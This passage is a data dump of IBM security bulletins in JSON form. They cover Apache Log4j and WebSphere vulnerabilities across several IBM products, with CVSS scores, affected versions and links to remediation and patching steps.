"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-27T10:23:01", "id": "209DDCAB6F475A868DA84DD19D31132027FF62B259B6541CA0C9859AD7CF6ED3", "href": "https://www.ibm.com/support/pages/node/6539552", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:49:35", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM Case Manager. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Case Manager| 5.3CD \nIBM Case Manager| 5.2.1 \nIBM Case Manager| 5.2.0 \nIBM Case Manager| 5.1.1 \n \n## Remediation/Fixes\n\nPlease consult the security bulletin [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSCTJ4\",\"label\":\"Case Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"5.1.1.x, 5.2.0, 5.2.1, 5.3.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T07:09:10", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM Case Manager (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-22T07:09:10", "id": "023C54E1D297D5AA9E7F44F8089DE35CB079281FA1776467BF8B7A7AD4FE252E", "href": "https://www.ibm.com/support/pages/node/6527332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-13T23:39:40", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Network Manager versions 4.1.1.x and 4.2.0.x. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNM| 4.1.1.x \nITNM| 4.2.0.x \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNM| 4.1.1.x| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10:\n\nSee section: For V8.5.0.0 through 8.5.5.20:\n\nSee section: For V8.0.0.0 through 8.0.0.15:\n\nSee section: For V7.0.0.0 through 7.0.0.45: \n \nITNM| 4.2.0.x| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10:\n\nSee section: For V8.5.0.0 through 8.5.5.20:\n\nSee section: For V8.0.0.0 through 8.0.0.15:\n\nSee section: For V7.0.0.0 through 7.0.0.45: \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nNone\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nNone\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHRK\",\"label\":\"Tivoli Network Manager IP Edition\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"4.2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T05:24:54", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Network Manager IP Edition (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-13T05:24:54", "id": "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "href": "https://www.ibm.com/support/pages/node/6540526", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-08T23:46:14", "description": "## Summary\n\nIBM Operations Analytics Predictive Insights is affected by the Apache Log4j vulnerability through the WebSphere Application Server (WAS) component. There is a separate security bulletin (linked below) that describes vulnerabilities (CVE-2021-4104, CVE-2021-45046) in the Apache Log4j library as used by WebSphere Application Server. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version(s}** \n---|--- \nIBM Operations Analytics Predictive Insights - All| Websphere Application Server 8.5 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities in IBM Operations Analytics Predictive Insights by upgrading IBM WebSphere Application Server now.**\n\nPlease use the instructions and full details disclosed in this security bulletin: [Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJQQ3\",\"label\":\"IBM Operations Analytics - Predictive Insights\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T10:45:22", "type": "ibm", "title": "Security Bulletin: IBM Operations Analytics Predictive Insights impacted by Apache Log4j vulnerabilities (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-30T10:45:22", "id": "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "href": "https://www.ibm.com/support/pages/node/6537584", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-08T21:53:38", "description": "## Summary\n\nIBM Tivoli Netcool Impact and IBM WebSphere Application Server are bundled as components of Tivoli Business Service Manager. Information about a security vulnerability affecting IBM Tivoli Netcool Impact and IBM WebSphere Application Server have been published in security bulletins.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Business Service Manager| 6.2.0 \nIBM Tivoli Business Service Manager for the Enterprise| 6.2.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the interim fixes below:\n\n_Principal Product and Version(s)_| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.2.0 \nTivoli Business Service Manager for the Enterprise 6.2.0| \n\n**For WebSphere Application Server (WAS) traditional:**\n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\nFor V8.5.0.0 through 8.5.5.20: \n\u00b7 Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PH42762](<https://www.ibm.com/support/pages/node/6526686> \"PH42762\" ) \n\\--OR-- \n\u00b7 Apply Fix Pack 8.5.5.21 or later fix pack if available. \n \n**For IBM Tivoli Netcool Impact: \n** \n[Security Bulletin: Vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6527266> \"Security Bulletin: Vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact \\(CVE-2021-44228\\)\" ) \n \nFor 7.1.0.18 through 7.1.0.24: \nApply Interim Fix [7.1.0-TIV-NCI-IF0010](<https://www.ibm.com/support/pages/node/6536702> \"7.1.0-TIV-NCI-IF0010\" ) \n \n## Workarounds and Mitigations\n\nIBM strongly recommends to apply the interim fixes now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSPFK\",\"label\":\"Tivoli Business Service Manager\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.1; 6.1.1; 6.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T15:48:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability (CVE-2021-44228) has been identified in IBM Tivoli Netcool Impact and IBM WebSphere Application Server bundled with Tivoli Business Service Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-06T15:48:44", "id": "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "href": "https://www.ibm.com/support/pages/node/6528944", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T01:50:17", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about security vulnerabilities affecting WAS have been published in security bulletins.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-38951](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38951>) \n** DESCRIPTION: **IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume all available CPU resources. IBM X-Force ID: 211405. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211405](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211405>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Rational ClearCase| 8.0.0 \nIBM Rational ClearCase| 9.0 \nIBM Rational ClearCase| 9.0.1 \nIBM Rational ClearCase| 9.1 \nIBM Rational ClearCase| 9.0.2 \nIBM Rational ClearCase| 8.0.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase.\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\nIBM WebSphere Application Server versions 7.0, 8.0, 8.5, and 9.0.\n\n| \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n[Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service (CVE-2021-38951)](<https://www.ibm.com/support/pages/node/6524674> \"Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service \\(CVE-2021-38951\\)\" ) \n \n**ClearCase Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section. Check your installed version of IBM WebSphere Application Server against this bulletin's list of vulnerable versions.\n 2. Identify the latest available fixes (per the bulletin(s) listed above) for the version of WAS used for CCRC WAN server.\n 3. Apply the appropriate WebSphere 